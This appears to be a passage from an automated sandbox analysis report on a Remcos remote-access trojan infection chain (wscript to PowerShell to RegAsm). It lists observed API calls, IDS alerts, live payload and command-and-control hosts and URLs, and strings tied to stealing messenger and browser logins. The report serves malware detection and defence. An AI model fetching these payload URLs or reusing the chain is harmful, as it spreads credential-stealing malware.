                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000009.00000002.2279074921.0000000006BD0000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,11_2_0040928E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,11_2_0041C322
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,11_2_0040C388
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,11_2_004096A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,11_2_00408847
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00407877 FindFirstFileW,FindNextFileW,11_2_00407877
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044E8F9 FindFirstFileExA,11_2_0044E8F9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,11_2_0040BB6B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,11_2_00419B86
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,11_2_0040BD72
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,11_2_100010F1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_10006580 FindFirstFileExA,11_2_10006580
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040AE51 FindFirstFileW,FindNextFileW,12_2_0040AE51
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407EF8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407898
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,11_2_00407CD2

                      Software Vulnerabilities

                      barindex
                      Suspicious execution chain found
                      Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49714 -> 135.148.195.248:6875
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49722 -> 135.148.195.248:6875
                      Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 192.3.220.40:80 -> 192.168.2.5:49708
                      Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 192.3.220.40:80 -> 192.168.2.5:49708
                      Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 185.199.111.133:443 -> 192.168.2.5:49707
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: idabo.duckdns.org
                      Uses dynamic DNS services
                      Source: unknownDNS query: name: idabo.duckdns.org
                      Source: global trafficTCP traffic: 192.168.2.5:49714 -> 135.148.195.248:6875
                      Source: global trafficHTTP traffic detected: GET /CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /450/RRFCCE.txt HTTP/1.1Host: 192.3.220.40Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 135.148.195.248 135.148.195.248
                      Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                      Source: Joe Sandbox ViewASN Name: AVAYAUS AVAYAUS
                      Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                      Source: Joe Sandbox ViewASN Name: FASTLYUS FASTLYUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49723 -> 178.237.33.50:80
                      Source: global trafficHTTP traffic detected: GET /450/seethebestpricewithgoodcookiesme.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.3.220.40Connection: Keep-Alive
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04EA4BB0 URLDownloadToFileW,1_2_04EA4BB0
                      Source: global trafficHTTP traffic detected: GET /CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /450/seethebestpricewithgoodcookiesme.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.3.220.40Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /450/RRFCCE.txt HTTP/1.1Host: 192.3.220.40Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                      Source: RegAsm.exe, 0000000F.00000002.2242699004.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                      Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.2242699004.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                      Source: RegAsm.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                      Source: RegAsm.exe, 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                      Source: RegAsm.exe, 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                      Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
                      Source: global trafficDNS traffic detected: DNS query: idabo.duckdns.org
                      Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                      Source: powershell.exe, 00000009.00000002.2235977032.00000000047E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2235977032.0000000004735000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40
                      Source: powershell.exe, 00000001.00000002.2137672850.0000000007BD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/
                      Source: powershell.exe, 00000009.00000002.2235977032.00000000047E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2235977032.0000000004735000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/450/RRFCCE.txt
                      Source: powershell.exe, 00000009.00000002.2235977032.00000000047E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/450/RRFCP
                      Source: powershell.exe, 00000001.00000002.2119899349.00000000050F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/450/seethebe
                      Source: powershell.exe, 00000001.00000002.2119899349.00000000050F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/450/seethebestpricewithgoodcookiesme.tIF
                      Source: powershell.exe, 00000001.00000002.2137672850.0000000007AF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/450/seethebestpricewithgoodcookiesme.tIFGm
                      Source: powershell.exe, 00000001.00000002.2137672850.0000000007AF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/450/seethebestpricewithgoodcookiesme.tIFPG
                      Source: powershell.exe, 00000001.00000002.2137672850.0000000007AF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/450/seethebestpricewithgoodcookiesme.tIFrosoft
                      Source: powershell.exe, 00000001.00000002.2118359781.00000000035F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/450/seethebestpricewithgoodcookiesme.tIFs
                      Source: powershell.exe, 00000001.00000002.2118359781.00000000035F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/450/seethebestpricewithgoodcookiesme.tIFvu
                      Source: powershell.exe, 00000009.00000002.2235977032.00000000047E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.24:
                      Source: bhv29F.tmp.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                      Source: bhv29F.tmp.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                      Source: powershell.exe, 00000001.00000002.2137672850.0000000007B8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                      Source: bhv29F.tmp.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                      Source: bhv29F.tmp.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                      Source: bhv29F.tmp.12.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                      Source: RegAsm.exe, RegAsm.exe, 0000000B.00000002.4471996980.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4471996980.0000000001424000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4471996980.000000000143F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4471996980.00000000013FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                      Source: powershell.exe, 00000009.00000002.2257703672.000000000571D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                      Source: RegAsm.exe, 0000000B.00000002.4471996980.00000000013FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpRr&
                      Source: RegAsm.exe, 0000000B.00000002.4471996980.00000000013FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gphy
                      Source: RegAsm.exe, 0000000B.00000002.4471996980.00000000013FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpur
                      Source: powershell.exe, 00000003.00000002.2060949985.0000000004DBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                      Source: powershell.exe, 00000001.00000002.2132026884.0000000006008000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2063385323.00000000056E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: bhv29F.tmp.12.drString found in binary or memory: http://ocsp.digicert.com0
                      Source: powershell.exe, 00000009.00000002.2235977032.0000000004608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2279258248.0000000006C3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000003.00000002.2060949985.00000000047D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: powershell.exe, 00000001.00000002.2119899349.0000000004FA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2060949985.0000000004681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2354881684.0000000005208000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2235977032.00000000044B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000003.00000002.2060949985.00000000047D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: powershell.exe, 00000009.00000002.2235977032.0000000004608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2279258248.0000000006C3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.2242699004.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                      Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.2242699004.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                      Source: RegAsm.exe, 0000000F.00000002.2242699004.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                      Source: RegAsm.exe, 0000000F.00000002.2242699004.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                      Source: RegAsm.exe, 0000000C.00000002.2251250013.0000000000BF4000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                      Source: RegAsm.exe, 0000000F.00000002.2242699004.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
